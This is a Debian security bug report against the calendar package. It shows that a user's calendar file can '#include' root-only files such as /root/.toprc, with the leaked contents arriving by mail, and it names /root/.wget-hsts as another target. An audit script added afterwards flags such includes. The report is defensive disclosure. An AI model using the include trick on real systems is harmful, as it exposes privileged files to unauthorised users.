Package: calendar
Version: 12.1.7+nmu3
Severity: serious
Tags: security
Justification: security
X-Debbugs-Cc: t...@mirbsd.de, Debian Security Team <t...@security.debian.org>

I was wondering how Debian’s calendar(1) packaging handled the
setusercontext(3) part, and after finding d/p/calendar_cap.diff
I see it just… does away with it õÕ

This allows wonderful information disclosure:

tglase@tglase-nb:~ $ cat .calendar/calendar
Nov 01 Allerheiligen
#define Def Nov 01
#define Job Nov 01
#define Mem Nov 01
#define Usr Nov 01
#include "/root/.toprc"
tglase@tglase-nb:~ $ cat /root/.toprc
cat: /root/.toprc: Permission denied

↓ ↓ ↓

From: Reminder Service <tgl...@tglase-nb.lan.tarent.de>
Message-ID: <20211031232839.c72361c3...@tglase-nb.lan.tarent.de>
To: tgl...@tglase-nb.lan.tarent.de
Date: Mon, 1 Nov 2021 00:28:39 +0100 (CET)
Subject: Monday's Calendar

Nov 01 Allerheiligen
Nov 01 fieldscur=AEhIOQTrspvuWbcdfgjyzlKNMX
    winflags=65208, sortindx=10, maxtasks=0
    summclr=6, msgsclr=6, headclr=7, taskclr=7
Nov 01 fieldscur=ABcefgjlrstuvyzMKNHIWOPQDX
    winflags=62776, sortindx=0, maxtasks=0
    summclr=6, msgsclr=6, headclr=7, taskclr=6
Nov 01 fieldscur=ANOPQRSTUVbcdefgjlmyzWHIKX
    winflags=62776, sortindx=13, maxtasks=0
    summclr=5, msgsclr=5, headclr=4, taskclr=5
Nov 01 fieldscur=ABDECGfhijlopqrstuvyzMKNWX
    winflags=62776, sortindx=4, maxtasks=0
    summclr=3, msgsclr=3, headclr=2, taskclr=3

This is *mildly* mitigated by the fact that you can only extract
contents of files that start with a cpp-able string *and* contain
a tab somewhere after that (because calendar(1) does not call cpp(1)
with -traditional-cpp, which is another minor bug in the port), but
I believe people can and will find creative ways to extract more.

/root/.wget-hsts can be used to see whether a given host was already
contacted, for example.

-- System Information:
Debian Release: 11.1
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable-security'), (500, 'stable-debug'), (500, 'oldstable-updates'), (500, 'oldoldstable'), (500, 'stable'), (500, 'oldstable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 5.10.0-8-amd64 (SMP w/2 CPU threads)
Kernel taint flags: TAINT_WARN
Locale: LANG=C.UTF-8, LC_CTYPE=C.UTF-8 (charmap=UTF-8), LANGUAGE not set
Shell: /bin/sh linked to /bin/lksh
Init: sysvinit (via /sbin/init)

Versions of packages calendar depends on:
ii  cpp      4:10.2.1-1
ii  libbsd0  0.11.3-1
ii  libc6    2.31-13+deb11u2

calendar recommends no packages.

calendar suggests no packages.

-- Configuration Files:
/etc/cron.daily/calendar changed:
. /etc/default/calendar
[ x$RUN_DAILY = xtrue ] || exit 0
[ -x /usr/sbin/sendmail ] || exit 0
if [ ! -x /usr/bin/cpp ]; then
  echo "The cpp package is needed to run calendar."
  exit 1
fi
/usr/bin/calendar -a

/etc/default/calendar changed:
RUN_DAILY=true

-- no debconf information
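
Added example, not part of the report or of the calendar package: an audit helper an administrator could run over per-user calendar files to flag #include directives like the one shown in the report, whose target is an absolute path or climbs out with "..". It is a detection heuristic for the window before privileges are dropped again, not a fix; the function names, the --demo switch and the sample users alice and bob are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag #include directives in per-user calendar files whose
# target is absolute or contains a ".." component.

# audit_calendar_includes FILE...
# Prints "file:line:target" per finding; exit status 1 if anything was flagged.
audit_calendar_includes() {
    found=0
    for f in "$@"; do
        [ -f "$f" ] || continue
        out=$(awk -v file="$f" '
            # cpp allows blanks around the "#"; accept quoted and <angle> forms
            /^[ \t]*#[ \t]*include[ \t]*["<]/ {
                t = $0
                sub(/^[ \t]*#[ \t]*include[ \t]*["<]/, "", t)
                sub(/[">].*$/, "", t)
                bad = (substr(t, 1, 1) == "/")
                n = split(t, part, "/")
                for (i = 1; i <= n; i++) if (part[i] == "..") bad = 1
                if (bad) printf "%s:%d:%s\n", file, NR, t
            }' "$f")
        if [ -n "$out" ]; then
            printf "%s\n" "$out"
            found=1
        fi
    done
    return "$found"
}

# Constructed sample input: a file shaped like the one in the report, plus a
# benign one that only uses relative and system includes.
make_samples() {
    dir=$1
    mkdir -p "$dir/alice/.calendar" "$dir/bob/.calendar"
    printf 'Nov 01\tAllerheiligen\n#define Def Nov 01\n#include "/root/.toprc"\n' \
        > "$dir/alice/.calendar/calendar"
    printf '#include <calendar.holiday>\n#include "work"\nDec 24\tHeiligabend\n' \
        > "$dir/bob/.calendar/calendar"
}

if [ "${1:-}" = "--demo" ]; then
    tmp=$(mktemp -d) && make_samples "$tmp"
    audit_calendar_includes "$tmp"/*/.calendar/calendar || echo "findings above"
    rm -rf "$tmp"
fi
```

On a real system the arguments would be the calendar files under each home directory, for example /home/*/.calendar/calendar.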